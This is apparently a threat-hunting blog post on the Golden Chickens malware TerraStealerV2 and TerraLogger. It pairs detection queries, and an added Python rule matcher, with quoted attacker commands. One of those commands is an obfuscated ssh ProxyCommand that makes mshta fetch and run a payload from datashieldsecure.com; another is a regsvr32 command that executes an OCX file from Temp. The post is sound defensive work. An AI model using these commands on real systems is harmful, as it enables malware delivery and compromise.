123. Hunting for Golden Chickens' New Malware
Hello everyone!
Insikt Group uncovered two new malware families: TerraStealerV2 and TerraLogger. Both were attributed to the threat actor known as Golden Chickens. The adversary operates a Malware-as-a-Service (MaaS) platform, providing tools to other criminals.
I've looked through the report, and (as always) caught a few detection and hunting opportunities.
For example, the adversary abused ssh.exe for proxying PowerShell execution:
"ssh.exe" -o ProxyCommand="powershell powershell ('datashieldsecure.com nikbfgppdkfjsfj msh ta run.mp4 http:'|Convert-String -E '1 2 3 4 5 6=34 6//1/2/5')"
We can hunt for similar activity using the following query:
event_type: "processcreatewin"
AND
proc_file_name: "ssh.exe"
AND
cmdline: "proxycommand"
Next thing, abusing regsvr32.exe for executing a malicious OCX file:
regsvr32.exe /s /i C:\Users\[redacted]\AppData\Local\Temp\2549828850.ocx
We can use the following query to hunt for OCX file executions from Temp folders:
event_type: "processcreatewin"
AND
proc_file_name: "regsvr32.exe"
AND
cmdline: "temp" AND "ocx"
One more thing: the stealer uses ifconfig[.]me to collect the compromised system's external IP address. We can use that DNS request for hunting as well:
event_type: "dnsreq"
AND
dns_rname: "ifconfig.me"
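The three queries above expressed as matching logic and run over constructed sample telemetry, as an added example (not code from the post or from the Insikt Group report). The field names follow the queries; the dictionary event format and the sample events are assumptions.

```python
"""Added example: the post's three hunting queries as Python predicates,
run over constructed sample events (event format and samples are assumed)."""

# Each rule: name, required event_type, and a predicate over the event.
RULES = [
    ("ssh_proxycommand", "processcreatewin",
     lambda e: e.get("proc_file_name", "").lower() == "ssh.exe"
               and "proxycommand" in e.get("cmdline", "").lower()),
    ("regsvr32_temp_ocx", "processcreatewin",
     lambda e: e.get("proc_file_name", "").lower() == "regsvr32.exe"
               and "temp" in e.get("cmdline", "").lower()
               and "ocx" in e.get("cmdline", "").lower()),
    ("dns_ifconfig_me", "dnsreq",
     lambda e: e.get("dns_rname", "").lower().rstrip(".") == "ifconfig.me"),
]

def match_rules(event):
    """Return the names of the hunting rules this single event satisfies."""
    return [name for name, etype, pred in RULES
            if event.get("event_type") == etype and pred(event)]

def hunt(events):
    """Map each rule name that fired to the list of events that triggered it."""
    hits = {}
    for e in events:
        for name in match_rules(e):
            hits.setdefault(name, []).append(e)
    return hits

# Constructed sample telemetry (not from the report): one hit and one
# benign event per rule, so false positives are visible too.
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin", "proc_file_name": "ssh.exe",
     "cmdline": '"ssh.exe" -o ProxyCommand="powershell ..."'},
    {"event_type": "processcreatewin", "proc_file_name": "ssh.exe",
     "cmdline": "ssh.exe admin@jumphost"},            # benign: no ProxyCommand
    {"event_type": "processcreatewin", "proc_file_name": "regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /i C:\Users\u\AppData\Local\Temp\1.ocx"},
    {"event_type": "processcreatewin", "proc_file_name": "regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Windows\System32\legit.dll"},  # benign
    {"event_type": "dnsreq", "dns_rname": "ifconfig.me"},
    {"event_type": "dnsreq", "dns_rname": "www.example.com"},       # benign
]

if __name__ == "__main__":
    for rule, evs in hunt(SAMPLE_EVENTS).items():
        print(rule, "->", len(evs), "event(s)")
```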
Make sure you've checked the report - it's full of detection ideas!
See you tomorrow!